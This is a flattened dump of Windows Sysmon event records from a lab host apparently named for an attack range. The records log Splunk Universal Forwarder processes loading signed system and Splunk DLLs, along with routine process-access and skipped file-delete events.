Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x8000000000000000100787Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000100786Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x8000000000000000100785Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000100784Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100783Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100782Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100781Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000100780Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x8000000000000000100779Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x8000000000000000100778Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 10341000x8000000000000000100777Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100776Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100775Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x8000000000000000100774Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100773Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exeMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778trueSplunk, Inc.Valid 10341000x8000000000000000100772Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100771Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100770Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100769Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100768Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-A252-6294-0500-000000005502}4161908C:\Windows\system32\csrss.exe{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100767Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.202{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100766Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.203{326FD73D-C16B-6294-4C0B-000000005502}6896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000100872Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:52.515{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93AA853E89B9EF816A18D4E125C82E03,SHA256=662F61CD9753F0B8612E9970D409F3086AF6DC2F6D71328F45014DD816954046,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100871Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:52.515{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77222C670D606DC0A36AC3EE89FB1999,SHA256=E49B3385945E5BFDA0B0B4FBABEAC27DA11B7960CD782FA51A2B18391F97886C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100870Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:52.156{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x8000000000000000100869Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:52.156{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100868Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:52.156{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x8000000000000000100867Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.999{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100866Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.999{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000100865Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.999{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000100864Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.999{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000100863Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.999{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000100862Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.999{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000100861Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.999{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000100860Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x8000000000000000100859Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x8000000000000000100858Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x8000000000000000100857Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000100856Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x8000000000000000100855Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:51.984{326FD73D-C16B-6294-4D0B-000000005502}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft 